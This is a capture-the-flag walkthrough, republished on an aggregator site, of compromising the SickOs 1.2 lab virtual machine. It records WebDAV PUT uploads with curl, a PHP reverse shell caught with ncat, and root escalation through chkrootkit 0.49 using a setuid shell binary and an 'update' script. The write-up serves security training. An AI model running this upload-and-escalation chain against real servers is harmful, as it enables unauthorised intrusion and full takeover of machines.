SickOs 1.2 Walkthrough

You can find SickOs here .

Quick run-down:

  1. Service enumeration
  2. Check for any vulnerabilities
  3. Escalate to Root
  4. Get our flag ��

Exploit used:

  1. Chkrootkit 0.49

After seeing what is on my net, I began to do an Nmap scan on my target to see what kind of services are running. I see port 80 open so I head to the webpage to see what it has in store for me.

[email protected]:~# nmap -A -p- 192.168.126.129
 
StartingNmap 7.12 ( https://nmap.org ) at 2016-04-29 01:54 EDT
Nmapscanreportfor 192.168.126.129
Hostis up (0.00046s latency).
Not shown: 65533 filteredports
PORT  STATESERVICEVERSION
22/tcpopen  ssh    OpenSSH 5.9p1 Debian 5ubuntu1.8 (UbuntuLinux; protocol 2.0)
| ssh-hostkey: 
|  1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|  2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcpopen  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Sitedoesn't have a title (text/html).
MACAddress: 00:0C:29:16:EB:35 (VMware)
Warning: OSScanresultsmaybeunreliablebecausewecouldnot findatleast 1 openand 1 closedport
Devicetype: generalpurpose
Running: Linux 3.X|4.X
OSCPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OSdetails: Linux 3.10 - 4.1, Linux 3.16 - 3.19, Linux 3.2 - 4.4
NetworkDistance: 1 hop
ServiceInfo: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOPRTT    ADDRESS
1  0.47 ms 192.168.126.129
 
OSand Servicedetectionperformed. Pleasereportanyincorrectresultsathttps://nmap.org/submit/ .
Nmapdone: 1 IPaddress (1 hostup) scannedin 113.70 seconds

I was greeted with a meme. As a side note, this is how my resting face looks like ��

Inspecting the page source didn’t really reveal anything too obvious to me, so I had downloaded the image to see if anything was maybe inside the image. No fruit.

As I was poking around, I decided to run a dirb scan on the page to see if anything fruitful would come out of it. A few seconds later, I had learned there is a “/test/” directory. Su-WEET! I also ran a Nikto scan to see if anything would come out of that. Nikto had brought nothing to me, but that is definitely a-okay.

[email protected]:~# dirb http://192.168.126.129 /usr/share/wordlists/dirb/common.txt
 
-----------------
DIRBv2.22    
ByTheDarkRaver
-----------------
 
START_TIME: FriApr 29 05:20:45 2016
URL_BASE: http://192.168.126.129/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
 
-----------------
 
GENERATEDWORDS: 4612                                                          
 
---- ScanningURL: http://192.168.126.129/ ----
+ http://192.168.126.129/index.php (CODE:200|SIZE:163)                                                              
==> DIRECTORY: http://192.168.126.129/test/                                                                        
                                                                                                                    
---- Enteringdirectory: http://192.168.126.129/test/ ----
(!) WARNING: DirectoryIS LISTABLE. Noneedto scanit.                        
    (Use mode '-w' if youwantto scanitanyway)
                                                                              
-----------------
END_TIME: FriApr 29 05:20:47 2016
DOWNLOADED: 4612 - FOUND: 1

Let’s take a look at what is in /test/

Here is where it took me a little while. I was searching Exploit-DB for lighttpd and Google for lighttpd 1.4.28 exploits. There were some older vulnerabilities, but not any for the version I was looking at. Banged my head a few times to see if maybe I had missed something so simple? BUT I WAS FINDING NOTHING.

I looked in the page source and that had nothing as well. How fun. I decided to see what happens if maybe I can do a GET request using Netcat. The beauty of using that was after entering the request, it would hang. Grrrrrr…

Next thing I did was fire up Burpsuite and see if at least THAT would capture something. Indeed it did, however it was nothing too crazy or out of the norm. Also, I wanted to try more requests and not just watch them. What else can do requests?? I turned to cURL and read the help.

Finally!! I grabbed something interesting using cURL. The awesome thing was I was able to specify what type of request I wanted to make.

[email protected]:~# curl -X OPTIONS -v http://192.168.126.129/test/
*  Trying 192.168.126.129...
* Connectedto 192.168.126.129 (192.168.126.129) port 80 (#0)
> OPTIONS /test/ HTTP/1.1
> Host: 192.168.126.129
> User-Agent: curl/7.47.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Allow: OPTIONS, GET, HEAD, POST
< Content-Length: 0
< Date: Fri, 29 Apr 2016 09:41:19 GMT
< Server: lighttpd/1.4.28
< 
* Connection #0 to host 192.168.126.129 left intact

I immediately noticed “PUT”. So I uploaded a test file to see if it would work. It didn’t upload at first, so I tried uploading it using “HTTP/1.0”. That worked with great success &#55357;&#56898;

[email protected]:~# curl --upload-file test.txt -v --url http://192.168.126.129/test/test.txt -0 --http1.0
*  Trying 192.168.126.129...
* Connectedto 192.168.126.129 (192.168.126.129) port 80 (#0)
> PUT /test/test.txtHTTP/1.0
> Host: 192.168.126.129
> User-Agent: curl/7.47.0
> Accept: */*
> Content-Length: 5
> 
* Wearecompletelyuploadedand fine
* HTTP 1.0, assumecloseafterbody
< HTTP/1.0 201 Created
< Content-Length: 0
< Connection: close
< Date: Fri, 29 Apr 2016 09:45:42 GMT
< Server: lighttpd/1.4.28
< 
* Closingconnection 0

What next you may ask?? Well…let me tell you! I turned to my handy-dandy php-reverse-shell. Using the default port number wouldn’t work so I changed it to port 443. I set up my listener, went to my shell, and voila! I caught shell!

[email protected]:~# ncat -nlvp 443
Ncat: Version 7.12 ( https://nmap.org/ncat )
Ncat: Listeningon :::443
Ncat: Listeningon 0.0.0.0:443
Ncat: Connectionfrom 192.168.126.129.
Ncat: Connectionfrom 192.168.126.129:50915.
Linuxubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 athlon i386 GNU/Linux
 02:55:29 up  4:36,  0 users,  loadaverage: 0.03, 0.07, 0.05
USER    TTY      FROM              [email protected]  IDLE  JCPU  PCPUWHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty ; pty.spawn("/bin/bash")'
[email protected]:/$ 

So after doing enumeration on the machine, we can see that there is a “chkrootkit” inside cron.daily. The interesting thing about this is that it’s version 0.49. According to Exploit-DB , if you place a file called “update” in /tmp, chkrootkit will run it with root privileges. Very nice.

Sooo…let’s escalate our privs!

First thing I did was create a little, stupid simple program that sets the setgid and setuid and then spawns a shell. After this, I take advantage of update to set root ownership of this simple, yet deadly binary that will allow me to run it >:D

If all goes well, I will now have a simple tool of mass destruction waiting for me in /tmp.

[email protected]:/tmp$ cat < root.c
cat < root.c
> int main(void) 
> { 
> setgid(0); 
> setuid(0); 
> execl("/bin/sh", "sh", 0); 
> }
> EOF
[email protected]:/tmp$ gccroot.c -o rootme
[email protected]:/tmp$ cat < update
cat < update
> #!/bin/bash
>
> chownroot /tmp/rootme
> chgrproot /tmp/rootme
> chmod u+s /tmp/rootme
>
> EOF
[email protected]:/tmp$ chmod +x update

Now, after waiting a minute or so…it’s time to check!

[email protected]:/tmp$ ls -al
ls -al
total 36
--snip--
-rwsrwxrwx  1 root    root    7235 Apr 29 05:16 rootme

Great success!!

All there is to do now is navigate to root folder and retrieve our flag!!

[email protected]:/root# cat *.txt
WoW! If youareviewingthis, Youhave "Sucessfully!!" completedSickOs1.2, thechallengeis morefocusedoneliminationoftoolin realscenarioswheretoolscanbeblockedduringanassesmentand therebyfoolingtester(s), gatheringmoreinformationaboutthetargetusingdifferentmethods, thoughwhile developingmanyofthetoolswerelimited/completelyblocked, to get a feelofOldSchooland testingitmanually.
 
Thanksfor givingthis try.
 
@vulnhub: Thanksfor hostingthis UP!.

This was an awesome, frustrating, and amazing VM brought to you by D4rk! Thanks man!! That was a great one and I hope to see more coming!

稿源:ch3rn0byl (源链) | 关于 | 阅读提示

本站遵循[CC BY-NC-SA 4.0]。如您有版权、意见投诉等问题,请通过eMail联系我们处理。
酷辣虫 » 后端存储 » SickOs 1.2 Walkthrough

喜欢 (0)or分享给?

专业 x 专注 x 聚合 x 分享 CC BY-NC-SA 4.0

使用声明 | 英豪名录